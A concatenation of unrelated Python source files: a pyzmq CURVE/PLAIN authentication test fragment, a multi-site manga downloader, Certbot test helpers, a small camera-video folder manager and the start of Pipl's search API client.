self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
with self.zap():
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
client.send(b'ping')
server.rcvtimeo = 250
self.assertRaisesErrno(zmq.EAGAIN, server.recv)
def test_keypair(self):
"""test curve_keypair"""
try:
public, secret = zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("CURVE unsupported")
self.assertEqual(type(secret), bytes)
self.assertEqual(type(public), bytes)
self.assertEqual(len(secret), 40)
self.assertEqual(len(public), 40)
# verify that it is indeed Z85
        bsecret, bpublic = [ z85.decode(key) for key in (secret, public) ]
self.assertEqual(type(bsecret), bytes)
self.assertEqual(type(bpublic), bytes)
self.assertEqual(len(bsecret), 32)
self.assertEqual(len(bpublic), 32)
def test_curve_public(self):
"""test curve_public"""
try:
public, secret = zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("CURVE unsupported")
if zmq.zmq_version_info() < (4,2):
raise SkipTest("curve_public is new in libzmq 4.2")
derived_public = zmq.curve_public(secret)
self.assertEqual(type(derived_public), bytes)
self.assertEqual(len(derived_public), 40)
# verify that it is indeed Z85
bpublic = z85.decode(derived_public)
self.assertEqual(type(bpublic), bytes)
self.assertEqual(len(bpublic), 32)
# verify that it is equal to the known public key
self.assertEqual(derived_public, public)
def test_curve(self):
"""test CURVE encryption"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
try:
server.curve_server = True
except zmq.ZMQError as e:
# will raise EINVAL if no CURVE support
if e.errno == zmq.EINVAL:
raise SkipTest("CURVE unsupported")
server_public, server_secret = zmq.curve_keypair()
client_public, client_secret = zmq.curve_keypair()
server.curve_secretkey = server_secret
server.curve_publickey = server_public
client.curve_serverkey = server_public
client.curve_publickey = client_public
client.curve_secretkey = client_secret
self.assertEqual(server.mechanism, zmq.CURVE)
self.assertEqual(client.mechanism, zmq.CURVE)
self.assertEqual(server.get(zmq.CURVE_SERVER), True)
self.assertEqual(client.get(zmq.CURVE_SERVER), False)
with self.zap():
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
|
__init__.py
|
# -*- coding: utf8 -*-
# Copyright (c) 2010-2017, Jamaludin Ahmad
# Released subject to the MIT License.
# Please see http://en.wikipedia.org/wiki/MIT_License
import os
import re
import sys
from collections import namedtuple
from queue import Queue
from threading import Semaphore, Thread
from urllib.parse import urljoin, urlparse
from zipfile import ZIP_DEFLATED, ZipFile
import requests
from lxml import html
Chapter = namedtuple('Chapter', 'number name url')
Page = namedtuple('Page', 'name url')
class MangaException(Exception):
"""Exception class for manga"""
pass
class GetManga(object):
def __init__(self, site, title):
self.concurrency = 4
self.path = '.'
self.title = title
self.manga = SITES[site](title)
@property
def chapters(self):
"""Show a list of available chapters"""
return self.manga.chapters
@property
def latest(self):
"""Show last available chapter"""
return self.manga.chapters[-1]
def get(self, chapter):
"""Downloads manga chapter as cbz archive"""
path = os.path.expanduser(self.path)
if not os.path.isdir(path):
try:
os.makedirs(path)
except OSError as msg:
raise MangaException(msg)
cbz_name = chapter.name + os.path.extsep + 'cbz'
cbz_file = os.path.join(path, cbz_name)
if os.path.isfile(cbz_file):
            sys.stdout.write("file {0} already exists, skipping download\n".format(cbz_name))
return
cbz_tmp = '{0}.tmp'.format(cbz_file)
try:
cbz = ZipFile(cbz_tmp, mode='w', compression=ZIP_DEFLATED)
except IOError as msg:
raise MangaException(msg)
sys.stdout.write("downloading {0} {1}:\n".format(self.title, chapter.number))
pages = self.manga.get_pages(chapter.url)
progress(0, len(pages))
threads = []
semaphore = Semaphore(self.concurrency)
queue = Queue()
for page in pages:
thread = Thread(target=self._get_image, args=(semaphore, queue, page))
thread.daemon = True
thread.start()
threads.append(thread)
try:
for thread in threads:
thread.join()
name, image = queue.get()
if not name:
raise MangaException(image)
cbz.writestr(name, image)
progress(len(cbz.filelist), len(pages))
except Exception as msg:
cbz.close()
os.remove(cbz_tmp)
raise MangaException(msg)
else:
cbz.close()
os.rename(cbz_tmp, cbz_file)
def _get_image(self, semaphore, queue, page):
"""Downloads page images inside a thread"""
try:
semaphore.acquire()
url = self.manga.get_image_url(page.url)
image_ext = urlparse(url).path.split('.')[-1]
name = page.name + os.path.extsep + image_ext
image = self.manga.download(url)
except MangaException as msg:
queue.put((None, msg))
else:
queue.put((name, image))
finally:
semaphore.release()
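    # Design note (descriptive only): get() starts one worker thread per page, but the
    # Semaphore(self.concurrency) caps how many downloads run at once; each worker puts
    # either (name, image) or (None, error) on the queue, and get() consumes exactly one
    # result per joined thread, writing pages into the cbz archive as they arrive.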
class MangaSite(object):
site_url = None
# all but mangareader uses descending chapter list
descending_list = True
_chapters_css = None
_pages_css = None
_image_css = None
def __init__(self, title):
# all sites only use lowercase title on their urls.
self.input_title = title.strip().lower()
@property
def title(self):
"""Returns the right manga title from user input"""
# combination of alphanumeric and underscore only is the most used format.
# used by: mangafox, mangastream, mangahere, mangatown
return re.sub(r'[^a-z0-9]+', '_', re.sub(r'^[^a-z0-9]+|[^a-z0-9]+$', '', self.input_title))
@property
def title_url(self):
"""Returns the index page's url of manga title"""
# this is the most common url for manga title
# used by: mangafox, mangastream, mangahere, mangatown
return "{0}/manga/{1}/".format(self.site_url, self.title)
@property
def chapters(self):
"""Returns available chapters"""
content = urlopen(self.title_url).text
doc = html.fromstring(content)
_chapters = doc.cssselect(self._chapters_css)
if self.descending_list:
_chapters = reversed(_chapters)
chapters = []
for _chapter in _chapters:
number = self._get_chapter_number(_chapter)
location = _chapter.get('href')
name = self._get_chapter_name(str(number), location)
url = self._get_chapter_url(location)
chapters.append(Chapter(number, name, url))
if not chapters:
raise MangaException("There is no chapter available.")
return chapters
def get_pages(self, chapter_url):
"""Returns a list of available pages of a chapter"""
content = urlopen(chapter_url).text
doc = html.fromstring(content)
_pages = doc.cssselect(self._pages_css)
pages = []
for _page in _pages:
name = self._get_page_name(_page.text)
if not name:
continue
url = self._get_page_url(chapter_url, name)
pages.append(Page(name, url))
return pages
def get_image_url(self, page_url):
"""Returns url of image from a chapter page"""
content = urlopen(page_url).text
doc = html.fromstring(content)
image_url = doc.cssselect(self._image_css)[0].get('src')
return urljoin(self.site_url, image_url)
@staticmethod
def download(image_url):
"""download manga's image"""
return urlopen(image_url).content
@staticmethod
def _get_chapter_number(chapter):
"""Returns chapter's number from a chapter's HtmlElement"""
# the most common one is getting the last word from a href section.
# used by: mangafox, mangahere, mangareader, mangatown
return chapter.text.strip().split(' ')[-1]
    def _get_chapter_name(self, number, location):
        """Returns the appropriate name for the chapter for the archive name"""
return "{0}_c{1}".format(self.title, number.zfill(3))
def _get_chapter_url(self, location):
"""Returns absolute url of chapter's page from location"""
return urljoin(self.site_url, location)
@staticmethod
def _get_page_name(page_text):
"""Returns page name from text available or None if it's not a valid page"""
# typical name: page's number, double page (eg. 10-11), or credits
        # normally the page listing for each chapter only has its name in it, but..
# - mangafox has comment section
# - mangatown & mangahere has advertisement on featured page.
if page_text == 'Featured':
return None
return page_text
@staticmethod
def _get_page_url(chapter_url, page_name):
"""Returns manga image page url"""
# every sites use different format for their urls, this is a sample.
# used by: mangahere, mangatown
return "{0}{1}.html".format(chapter_url, page_name)
class MangaHere(MangaSite):
"""class for mangahere site"""
site_url = "http://www.mangahere.cc"
_chapters_css = "div.detail_list ul li a"
_pages_css = "section.readpage_top div.go_page select option"
_image_css = "img#image"
class MangaTown(MangaSite):
"""class for mangatown site"""
site_url = "http://www.mangatown.com"
_chapters_css = "div.chapter_content ul.chapter_list li a"
_pages_css = "div.manga_read_footer div.page_select select option"
_image_css = "img#image"
class MangaFox(MangaSite):
"""class for mangafox site"""
# their slogan should be: "we are not the best, but we are the first"
site_url = "http://mangafox.la"
_chapters_css = "a.tips"
_pages_css = "#top_bar option"
_image_css = "img#image"
@staticmethod
def _get_page_name(page_text):
"""Returns page name from text available"""
# mangafox has comments section in it's page listing
if page_text == 'Comments':
return None
return page_text
@staticmethod
def _get_page_url(chapter_url, page_name):
"""Returns manga image page url"""
# chapter's page already has the first page's name in it.
return re.sub(r'[0-9]+.html$', "{0}.html".format(page_name), chapter_url)
class MangaStream(MangaSite):
"""class for mangastream site"""
# a real scanlation group, not distro sites like the others here,
# currently doesn't utilize _get_page_name and override get_pages instead.
site_url = "https://readms.net"
_chapters_css = "td a"
_pages_css = "div.btn-group ul.dropdown-menu li a"
_image_css = "img#manga-page"
def get_pages(self, chapter_url):
"""Returns a list of available pages of a chapter"""
content = urlopen(chapter_url).text
doc = html.fromstring(content)
_pages = doc.cssselect(self._pages_css)
for _page in _pages:
page_text = _page.text
if not page_text:
continue
if 'Last Page' in page_text:
last_page = re.search('[0-9]+', page_text).group(0)
pages = []
for num in range(1, int(last_page) + 1):
name = str(num)
url = self._get_page_url(chapter_url, name)
pages.append(Page(name, url))
return pages
@staticmethod
def _get_chapter_number(chapter):
"""Returns chapter's number from a chapter's HtmlElement"""
return chapter.text.split(' - ')[0]
@staticmethod
def _get_page_url(chapter_url, page_name):
"""Returns manga image page url"""
return re.sub('[0-9]+$', page_name, chapter_url)
class MangaReader(MangaSite):
"""class for mangareader site"""
site_url = "http://www.mangareader.net"
descending_list = False
_chapters_css = "#chapterlist td a"
_pages_css = "div#selectpage option"
_image_css = "img#img"
@property
def title(self):
"""Returns the right manga title from user input"""
return re.sub(r'[^\-a-z0-9]', '', re.sub(r'[ _]', '-', self.input_title))
@property
def title_url(self):
"""Returns the index page's url of manga title"""
# some title's page is in the root, others hidden in a random numeric subdirectory,
# so we need to search the manga list to get the correct url.
try:
content = urlopen("{0}/alphabetical".format(self.site_url)).text
page = re.findall(r'[0-9]+/' + self.title + '.html', content)[0]
url = "{0}/{1}".format(self.site_url, page)
except IndexError:
url = "{0}/{1}".format(self.site_url, self.title)
return url
@staticmethod
def _get_page_url(chapter_url, page_name='1'):
"""Returns manga image page url"""
        # older stuff, the one in a numeric subdirectory, is typically named "chapter-X.html",
        # while the new stuff only uses a page number.
if chapter_url.endswith('.html'):
page = re.sub(r'\-[0-9]+/', "-{0}/".format(page_name), chapter_url)
            return page
else:
return "{0}/{1}".format(chapter_url, page_name)
SITES = dict(mangafox=MangaFox,
mangahere=MangaHere,
mangareader=MangaReader,
mangastream=MangaStream,
mangatown=MangaTown)
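# A minimal usage sketch of the classes above (illustrative only, never called by the module;
# assumes the 'mangareader' site is reachable and hosts the given title).
def _example_usage():
    manga = GetManga('mangareader', 'one piece')
    print(manga.latest)       # newest Chapter(number, name, url)
    manga.get(manga.latest)   # writes <title>_cNNN.cbz into manga.path (default '.')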
def urlopen(url):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 \
(KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36'}
    resp = None
    retry = 0
while retry < 5:
try:
resp = requests.get(url, timeout=5, headers=headers)
if 400 <= resp.status_code < 500:
retry = 5
elif 500 <= resp.status_code < 600:
retry += 1
elif 'content-length' in resp.headers and \
len(resp.content) != int(resp.headers['content-length']):
retry += 1
else:
retry = 5
except Exception:
retry += 1
    if resp is None or not resp.content:
raise MangaException("Failed to retrieve {0}".format(url))
return resp
def progress(page, total):
"""Display progress bar"""
try:
page, total = int(page), int(total)
marks = int(round(50 * (page / total)))
spaces = int(round(50 - marks))
except Exception:
raise MangaException('Unknown error')
loader = '[' + ('#' * int(marks)) + ('-' * int(spaces)) + ']'
sys.stdout.write('%s page %d of %d\r' % (loader, page, total))
if page == total:
sys.stdout.write('\n')
sys.stdout.flush()
|
util.py
|
"""Test utilities."""
import logging
from multiprocessing import Event
from multiprocessing import Process
import shutil
import sys
import tempfile
import unittest
import warnings
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
import josepy as jose
try:
import mock
warnings.warn(
"The external mock module is being used for backwards compatibility "
"since it is available, however, future versions of Certbot's tests will "
"use unittest.mock. Be sure to update your code accordingly.",
PendingDeprecationWarning
)
except ImportError: # pragma: no cover
from unittest import mock # type: ignore
import OpenSSL
import pkg_resources
import six
from six.moves import reload_module
from certbot import interfaces
from certbot import util
from certbot._internal import configuration
from certbot._internal import constants
from certbot._internal import lock
from certbot._internal import storage
from certbot.compat import filesystem
from certbot.compat import os
from certbot.display import util as display_util
def vector_path(*names):
"""Path to a test vector."""
return pkg_resources.resource_filename(
__name__, os.path.join('testdata', *names))
def load_vector(*names):
"""Load contents of a test vector."""
# luckily, resource_string opens file in binary mode
data = pkg_resources.resource_string(
__name__, os.path.join('testdata', *names))
# Try at most to convert CRLF to LF when data is text
try:
return data.decode().replace('\r\n', '\n').encode()
except ValueError:
# Failed to process the file with standard encoding.
# Most likely not a text file, return its bytes untouched.
return data
def _guess_loader(filename, loader_pem, loader_der):
_, ext = os.path.splitext(filename)
if ext.lower() == '.pem':
return loader_pem
elif ext.lower() == '.der':
return loader_der
raise ValueError("Loader could not be recognized based on extension") # pragma: no cover
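# e.g. _guess_loader('cert.pem', FILETYPE_PEM, FILETYPE_ASN1) returns FILETYPE_PEM and
#      _guess_loader('cert.der', FILETYPE_PEM, FILETYPE_ASN1) returns FILETYPE_ASN1;
#      any other extension raises ValueError.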
def load_cert(*names):
"""Load certificate."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate(loader, load_vector(*names))
def load_csr(*names):
"""Load certificate request."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names))
def load_comparable_csr(*names):
"""Load ComparableX509 certificate request."""
return jose.ComparableX509(load_csr(*names))
def load_rsa_private_key(*names):
"""Load RSA private key."""
loader = _guess_loader(names[-1], serialization.load_pem_private_key,
serialization.load_der_private_key)
return jose.ComparableRSAKey(loader(
load_vector(*names), password=None, backend=default_backend()))
def load_pyopenssl_private_key(*names):
"""Load pyOpenSSL private key."""
loader = _guess_loader(
names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1)
return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
def make_lineage(config_dir, testfile, ec=False):
"""Creates a lineage defined by testfile.
This creates the archive, live, and renewal directories if
necessary and creates a simple lineage.
:param str config_dir: path to the configuration directory
:param str testfile: configuration file to base the lineage on
:returns: path to the renewal conf file for the created lineage
:rtype: str
"""
lineage_name = testfile[:-len('.conf')]
conf_dir = os.path.join(
config_dir, constants.RENEWAL_CONFIGS_DIR)
archive_dir = os.path.join(
config_dir, constants.ARCHIVE_DIR, lineage_name)
live_dir = os.path.join(
config_dir, constants.LIVE_DIR, lineage_name)
for directory in (archive_dir, conf_dir, live_dir,):
if not os.path.exists(directory):
filesystem.makedirs(directory)
sample_archive = vector_path('sample-archive{}'.format('-ec' if ec else ''))
for kind in os.listdir(sample_archive):
shutil.copyfile(os.path.join(sample_archive, kind),
os.path.join(archive_dir, kind))
for kind in storage.ALL_FOUR:
os.symlink(os.path.join(archive_dir, '{0}1.pem'.format(kind)),
os.path.join(live_dir, '{0}.pem'.format(kind)))
conf_path = os.path.join(config_dir, conf_dir, testfile)
with open(vector_path(testfile)) as src:
with open(conf_path, 'w') as dst:
dst.writelines(
line.replace('MAGICDIR', config_dir) for line in src)
return conf_path
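# With the default directory constants this produces, for make_lineage(config_dir, 'example.org.conf')
# (a hypothetical test file name), roughly:
#   <config_dir>/renewal/example.org.conf
#   <config_dir>/archive/example.org/{cert,privkey,chain,fullchain}1.pem
#   <config_dir>/live/example.org/{cert,privkey,chain,fullchain}.pem  (symlinks into archive/)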
def patch_get_utility(target='zope.component.getUtility'):
"""Patch zope.component.getUtility to use a special mock IDisplay.
    The mock IDisplay works like a regular mock object, except it also
    asserts that methods are called with valid arguments.
:param str target: path to patch
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
return mock.patch(target, new_callable=_create_get_utility_mock)
def patch_get_utility_with_stdout(target='zope.component.getUtility',
stdout=None):
"""Patch zope.component.getUtility to use a special mock IDisplay.
    The mock IDisplay works like a regular mock object, except it also
    asserts that methods are called with valid arguments.
The `message` argument passed to the IDisplay methods is passed to
stdout's write method.
:param str target: path to patch
:param object stdout: object to write standard output to; it is
expected to have a `write` method
:returns: mock zope.component.getUtility
:rtype: mock.MagicMock
"""
stdout = stdout if stdout else six.StringIO()
freezable_mock = _create_get_utility_mock_with_stdout(stdout)
return mock.patch(target, new=freezable_mock)
class FreezableMock(object):
"""Mock object with the ability to freeze attributes.
This class works like a regular mock.MagicMock object, except
attributes and behavior set before the object is frozen cannot
be changed during tests.
If a func argument is provided to the constructor, this function
is called first when an instance of FreezableMock is called,
followed by the usual behavior defined by MagicMock. The return
value of func is ignored.
"""
def __init__(self, frozen=False, func=None, return_value=mock.sentinel.DEFAULT):
self._frozen_set = set() if frozen else {'freeze', }
self._func = func
self._mock = mock.MagicMock()
if return_value != mock.sentinel.DEFAULT:
self.return_value = return_value
self._frozen = frozen
def freeze(self):
"""Freeze object preventing further changes."""
self._frozen = True
def __call__(self, *args, **kwargs):
if self._func is not None:
self._func(*args, **kwargs)
return self._mock(*args, **kwargs)
def __getattribute__(self, name):
if name == '_frozen':
try:
return object.__getattribute__(self, name)
except AttributeError:
return False
elif name in ('return_value', 'side_effect',):
return getattr(object.__getattribute__(self, '_mock'), name)
elif name == '_frozen_set' or name in self._frozen_set:
return object.__getattribute__(self, name)
else:
return getattr(object.__getattribute__(self, '_mock'), name)
def __setattr__(self, name, value):
""" Before it is frozen, attributes are set on the FreezableMock
instance and added to the _frozen_set. Attributes in the _frozen_set
cannot be changed after the FreezableMock is frozen. In this case,
they are set on the underlying _mock.
In cases of return_value and side_effect, these attributes are always
passed through to the instance's _mock and added to the _frozen_set
before the object is frozen.
"""
if self._frozen:
if name in self._frozen_set:
raise AttributeError('Cannot change frozen attribute ' + name)
return setattr(self._mock, name, value)
if name != '_frozen_set':
self._frozen_set.add(name)
if name in ('return_value', 'side_effect'):
return setattr(self._mock, name, value)
return object.__setattr__(self, name, value)
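# A minimal sketch of the freezing behaviour described above (illustrative only, not used
# by the tests).
def _freezable_mock_example():
    m = FreezableMock()
    m.some_attr = 1        # set before freezing, so the name becomes frozen
    m.freeze()
    try:
        m.some_attr = 2    # rejected: frozen attributes cannot be changed
    except AttributeError:
        pass
    m.other = 3            # unknown names still pass through to the underlying MagicMock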
def _create_get_utility_mock():
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
    for name in interfaces.IDisplay.names(): # pylint: disable=E1120
if name != 'notification':
frozen_mock = FreezableMock(frozen=True, func=_assert_valid_call)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _create_get_utility_mock_with_stdout(stdout):
    def _write_msg(message, *unused_args, **unused_kwargs):
        """Write message to stdout.
        """
if message:
stdout.write(message)
def mock_method(*args, **kwargs):
"""
Mock function for IDisplay methods.
"""
_assert_valid_call(args, kwargs)
_write_msg(*args, **kwargs)
display = FreezableMock()
# Use pylint code for disable to keep on single line under line length limit
    for name in interfaces.IDisplay.names(): # pylint: disable=E1120
if name == 'notification':
frozen_mock = FreezableMock(frozen=True,
func=_write_msg)
setattr(display, name, frozen_mock)
else:
frozen_mock = FreezableMock(frozen=True,
func=mock_method)
setattr(display, name, frozen_mock)
display.freeze()
return FreezableMock(frozen=True, return_value=display)
def _assert_valid_call(*args, **kwargs):
assert_args = [args[0] if args else kwargs['message']]
assert_kwargs = {}
assert_kwargs['default'] = kwargs.get('default', None)
assert_kwargs['cli_flag'] = kwargs.get('cli_flag', None)
assert_kwargs['force_interactive'] = kwargs.get('force_interactive', False)
display_util.assert_valid_call(*assert_args, **assert_kwargs)
class TempDirTestCase(unittest.TestCase):
"""Base test class which sets up and tears down a temporary directory"""
def setUp(self):
"""Execute before test"""
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
"""Execute after test"""
# Cleanup opened resources after a test. This is usually done through atexit handlers in
# Certbot, but during tests, atexit will not run registered functions before tearDown is
# called and instead will run them right before the entire test process exits.
        # This is a problem on Windows, which does not allow removing files that are still open.
logging.shutdown()
# Remove logging handlers that have been closed so they won't be
# accidentally used in future tests.
logging.getLogger().handlers = []
util._release_locks() # pylint: disable=protected-access
shutil.rmtree(self.tempdir)
class ConfigTestCase(TempDirTestCase):
"""Test class which sets up a NamespaceConfig object."""
def setUp(self):
super(ConfigTestCase, self).setUp()
self.config = configuration.NamespaceConfig(
mock.MagicMock(**constants.CLI_DEFAULTS)
)
self.config.verb = "certonly"
self.config.config_dir = os.path.join(self.tempdir, 'config')
self.config.work_dir = os.path.join(self.tempdir, 'work')
self.config.logs_dir = os.path.join(self.tempdir, 'logs')
self.config.cert_path = constants.CLI_DEFAULTS['auth_cert_path']
self.config.fullchain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.chain_path = constants.CLI_DEFAULTS['auth_chain_path']
self.config.server = "https://example.com"
def _handle_lock(event_in, event_out, path):
"""
Acquire a file lock on given path, then wait to release it. This worker is coordinated
using events to signal when the lock should be acquired and released.
:param multiprocessing.Event event_in: event object to signal when to release the lock
:param multiprocessing.Event event_out: event object to signal when the lock is acquired
:param path: the path to lock
"""
if os.path.isdir(path):
my_lock = lock.lock_dir(path)
else:
my_lock = lock.LockFile(path)
try:
event_out.set()
assert event_in.wait(timeout=20), 'Timeout while waiting to release the lock.'
finally:
my_lock.release()
def lock_and_call(callback, path_to_lock):
"""
Grab a lock on path_to_lock from a foreign process then execute the callback.
:param callable callback: object to call after acquiring the lock
:param str path_to_lock: path to file or directory to lock
"""
# Reload certbot.util module to reset internal _LOCKS dictionary.
reload_module(util)
emit_event = Event()
receive_event = Event()
process = Process(target=_handle_lock, args=(emit_event, receive_event, path_to_lock))
process.start()
# Wait confirmation that lock is acquired
assert receive_event.wait(timeout=10), 'Timeout while waiting to acquire the lock.'
# Execute the callback
callback()
# Trigger unlock from foreign process
emit_event.set()
# Wait for process termination
process.join(timeout=10)
assert process.exitcode == 0
def skip_on_windows(reason):
"""Decorator to skip permanently a test on Windows. A reason is required."""
def wrapper(function):
"""Wrapped version"""
return unittest.skipIf(sys.platform == 'win32', reason)(function)
return wrapper
def temp_join(path):
"""
Return the given path joined to the tempdir path for the current platform
Eg.: 'cert' => /tmp/cert (Linux) or 'C:\\Users\\currentuser\\AppData\\Temp\\cert' (Windows)
"""
return os.path.join(tempfile.gettempdir(), path)
|
folderapp.py
|
#!/usr/bin/python3
"""
simple module to manage the video files generated by the camera app
"""
from pootlestuff import watchables as wv
import os, pathlib, time, threading, queue
class fileManager(wv.watchablesmart):
def __init__(self, **kwargs):
self.diskfree=wv.floatWatch(app=self, value=float('nan'))
wables=[
('basefoldervar', wv.folderWatch, '', False),
]
super().__init__(wabledefs=wables, **kwargs)
self.currentfiles=None
self.filetime=time.time()
self.cq=queue.Queue()
self.running=True
self.fthread=threading.Thread(name='filer', target=self.slowthread)
self.fthread.start()
def make_page(self, pagelist, qp, pp, page):
if self.currentfiles is None or 'refresh' in qp:
self.currentfiles=filething(root=self.basefoldervar.getValue())
self.filetime=time.time()
with open(page, 'r') as pf:
return {'resp':200, 'headers': (('Content-Type', 'text/html; charset=utf-8'),), 'data': pf.read().format(stuff=self.currentfiles.make_html())}
def vidpage(self, pagelist, qp, pp):
return vpage.format(qp['fileid'][0])
def resolvevidfile(self, qp):
fp=self.basefoldervar.getFolder()/qp['fileid'][0]
return fp
def slowthread(self):
cmd=None
while self.running:
if cmd is None:
fp=self.basefoldervar.getValue()
diskinfo=os.statvfs(fp)
nv=diskinfo.f_bavail/diskinfo.f_blocks
self.diskfree.setValue(nv,wv.myagents.app)
try:
cmd=self.cq.get(timeout=10)
except queue.Empty:
cmd=None
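    # Note on the maths above: f_bavail/f_blocks is the fraction of the filesystem still
    # available to unprivileged processes, so diskfree holds a value between 0.0 and 1.0
    # that is refreshed roughly every 10 seconds (the queue.get timeout).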
def stopme(self):
self.running=False
self.cq.put('stop')
self.fthread.join()
def sizestr(size):
if size < 10000:
return '{:,}B '.format(size)
if size < 10000000:
return '{:,}KB'.format((size+499)//1000)
if size < 10000000000:
return '{:,}MB'.format((size+499999)//1000000)
return '{:,}GB'.format((size+499999999)//1000000000)
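# Rough behaviour of sizestr (illustrative): sizestr(9999) -> '9,999B ', sizestr(10000) -> '10KB',
# sizestr(2500000) -> '2,500KB', sizestr(5 * 10**9) -> '5,000MB'.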
filestr='%s%-25s (%7s)'
class filething():
def __init__(self, root, sorton='name', filtercount=None, showerrors=True):
assert sorton in ('name', 'size')
rp=pathlib.Path(root).expanduser().resolve()
basedepth=len(str(rp).split('/'))
xgen=os.fwalk(str(rp),)
xgc=0
print('in', rp)
for dirpath, dirnames, filenames, dir_fd in xgen:
pathsplit=dirpath.split('/')
            try:
                finfos=[(fn, os.stat(fn, dir_fd=dir_fd).st_size) for fn in filenames]
            except:
                # bulk stat failed - fall back to stat-ing each file so one bad entry is skipped
                finfos=[]
                for fn in filenames:
                    try:
                        finfos.append((fn, os.stat(fn, dir_fd=dir_fd).st_size))
                    except:
                        if showerrors:
                            print('oops at', fn, 'in', dirpath)
filtcount=0
            if filtercount is not None:
for fn in filenames:
if fn.endswith(filtercount):
filtcount+=1
if sorton=='name':
sortix=0
sreverse=False
elif sorton=='size':
sortix=1
sreverse=True
else:
                raise ValueError('I cannot sort on ' + str(sorton))
finfos.sort(key=lambda x: x[sortix], reverse=sreverse)
dirdict={'folds': {},
'files': dict(finfos),
'path' : dirpath,
'name' : pathsplit[-1]}
pcount=len(pathsplit)-basedepth
if pcount==0:
self.data=dirdict
plist=[dirdict]
elif pcount==len(plist):
plist[-1]['folds'][pathsplit[-1]] = dirdict
plist.append(dirdict)
elif pcount > len(plist):
print('NEVERRRRRRRRRRR')
elif pcount < len(plist):
while pcount < len(plist):
finished = plist.pop(-1)
finished['size'] = sum(finished['files'].values()) + sum(f['size'] for f in finished['folds'].values())
finished['filtc'] = len(finished['files']) + sum(f['filtc'] for f in finished['folds'].values())
if len(finished['folds']) > 0:
sx=list(finished['folds'].items())
sx.sort(key=lambda kv: kv[1][sorton], reverse=sreverse)
finished['folds']=dict(sx)
plist[-1]['folds'][pathsplit[-1]] = dirdict
plist.append(dirdict)
else:
print('too steep?')
xgc +=1
while len(plist) > 0:
finished=plist.pop(-1)
finished['size'] = sum(finished['files'].values()) + sum(f['size'] for f in finished['folds'].values())
if len(finished['folds']) > 0:
sx=list(finished['folds'].items())
sx.sort(key=lambda kv: kv[1][sorton], reverse=sreverse)
finished['folds']=dict(sx)
print(sizestr(self.data['size']))
def pretty(self, levels=2):
prettydict(self.data, levels=levels, indent=0)
def make_html(self):
return '<p>no files found</p>' if len(self.data['files'])==0 and len(self.data['folds']) == 0 else '<ul class="ftree">\n'+htmldict(self.data, indent=1)+'</ul>\n'
lifilehtml='{ind:s}<li><span>{name:s}</span><span>{size:s}</span><input type="checkbox" name="x" value=""></li>\n'
lilifihtml="""{ind:s}<li><span onclick="showvid('{upstr}/{dn}/{name}')" style="cursor: pointer;" >{name:s}</span><span>{size:s}</span><input type="checkbox" name="{upstr}/{dn}/{name}" value=""></li>\n"""
lifoldhtml='{ind:s}<li{preop}><a href="#"><span>{name:s}</span></a>{size:s}\n{ind:s}<ul class="ftree">\n{fstr:s}{ind:s}</ul></li>\n'
def htmldict(adict, indent, upstr=''):
istr=' ' * indent
files=[(lilifihtml if fn.endswith('.mp4') else lifilehtml).format(ind=istr, name=fn, dn=adict['name'], size=sizestr(fs), upstr=upstr) for fn, fs in adict['files'].items()]
upstr='' if indent==1 else adict['name'] if indent==2 else upstr+'/'+adict['name']
flist=list(adict['folds'].values())
if flist:
folds=[lifoldhtml.format(
ind=istr, name=fdict['name'], size=sizestr(fdict['size']), fstr=htmldict(fdict, indent+1, upstr), preop='')
for fdict in flist[:-1]]
fdict=flist[-1]
folds.append(lifoldhtml.format(
ind=istr, name=fdict['name'], size=sizestr(fdict['size']), fstr=htmldict(fdict, indent+1, upstr), preop=' class="open" '))
else:
folds=[]
return ''.join(folds)+''.join(files)
def prettydict(adict, levels, indent):
prestr='| ' * indent
print('{:s}{:22s} {:s}'.format(prestr, adict['name'], sizestr(adict['size'])))
if levels > 0:
prestr += '| '
for fn, fs in adict['files'].items():
print('{:s}{:22s} {:s}'.format(prestr, fn, sizestr(fs)))
for dn in adict['folds'].values():
prettydict(dn, levels-1, indent+1)
|
search.py
|
"""Python wrapper for easily making calls to Pipl's Search API.
Pipl's Search API allows you to query with the information you have about
a person (his name, address, email, phone, username and more) and in response
get all the data available on him on the web.
The classes contained in this module are:
- SearchAPIRequest -- Build your request and send it.
- SearchAPIResponse -- Holds the response from the API in case it contains data.
- SearchAPIError -- An exception raised when the API response is an error.
The classes are based on the person data-model that's implemented here in the
sub-package piplapis.data.
"""
import json
import datetime
import logging
import pytz as pytz
from six import string_types
try:
import urllib.request as urllib2
from urllib.parse import urlencode
except ImportError:
import urllib2
from urllib import urlencode
import urllib
import itertools
import threading
import piplapis
from piplapis.data.available_data import AvailableData
from piplapis.error import APIError
from piplapis.data import *
from piplapis.data.utils import Serializable
logger = logging.getLogger(__name__)
class SearchAPIRequest(object):
"""A request to Pipl's Search API.
Building the request from the query parameters can be done in two ways:
Option 1 - directly and quickly (for simple requests with only few
parameters):
>>> from piplapis.search import SearchAPIRequest
>>> request = SearchAPIRequest(api_key='samplekey', email='clark.kent@example.com')
>>> response = request.send()
Option 2 - using the data-model (useful for more complex queries; for
